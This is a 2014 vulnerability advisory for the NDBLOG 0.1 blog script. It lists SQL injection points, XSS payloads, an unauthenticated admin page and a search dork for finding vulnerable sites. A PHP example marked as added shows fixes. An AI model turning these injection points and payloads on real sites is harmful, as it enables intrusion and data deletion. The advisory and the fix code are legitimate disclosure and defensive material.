
NDBLOG version 0.1 Multiple Vulnerabilities

Author: indoushka, Published: 25-10-2014
Vendor : ALAMARAB2.com
Dork : جميع الحقوق محفوظة © - ALAMARAB2.com - NDBLOG v_0.1
==================================================

SQL injection :

http://localhost/ND/blog.php?id=85 (inject here)

Blind SQL injection :

http://localhost/ND/blog.php?action=delete&id=11 (inject here)

Panel = localhost/ND/admin/

Login = http://localhost/ND/login.php

Cross-site scripting (verified) :

URL-encoded POST input user was set to 1'"()&%<ScRiPt >prompt(999862)</ScRiPt>

Cross-site scripting [stored] (verified) :

URL-encoded POST input img was set to 1" onmouseover=prompt(976473) bad="
The input is reflected in http://localhost/ND/
The input is reflected inside a tag parameter between double quotes.
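
One way to close the two input-handling issues above (the injectable id parameter and the img value reflected inside a double-quoted attribute), shown in PHP. This is an added example, not NDBLOG code and not from the advisory's author; the posts table, its columns and the function names parse_id, fetch_post, attr and render_img are assumptions.

```php
<?php
// Added example: hypothetical hardened handlers, not NDBLOG source code.
// Table, column and function names are assumptions for illustration.

// Constructed in-memory database standing in for the blog's post table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, img TEXT)');
$db->exec("INSERT INTO posts VALUES (85, 'Hello', 'pic.png')");

// Accept only a positive decimal integer for id; anything else is rejected.
function parse_id($raw): ?int {
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Bound parameter: the value is sent separately from the SQL text,
// so it can never change the structure of the query.
function fetch_post(PDO $db, int $id): ?array {
    $stmt = $db->prepare('SELECT id, title, img FROM posts WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Attribute-context encoding: with ENT_QUOTES both quote characters are
// encoded, so stored input cannot close the attribute and add a handler.
function attr(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_img(string $src): string {
    return '<img src="' . attr($src) . '" alt="">';
}

// Constructed inputs modelled on the advisory's test strings.
foreach (['85', "85' OR '1'='1"] as $raw) {
    $id = parse_id($raw);
    var_dump($id === null ? 'rejected' : fetch_post($db, $id));
}
echo render_img('1" onmouseover=prompt(976473) bad="'), "\n";
```

The delete action in the advisory takes the same id parameter, so the same validation and bound-parameter pattern applies to it.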

Bypass :

http://localhost/ND/admin/menu.php
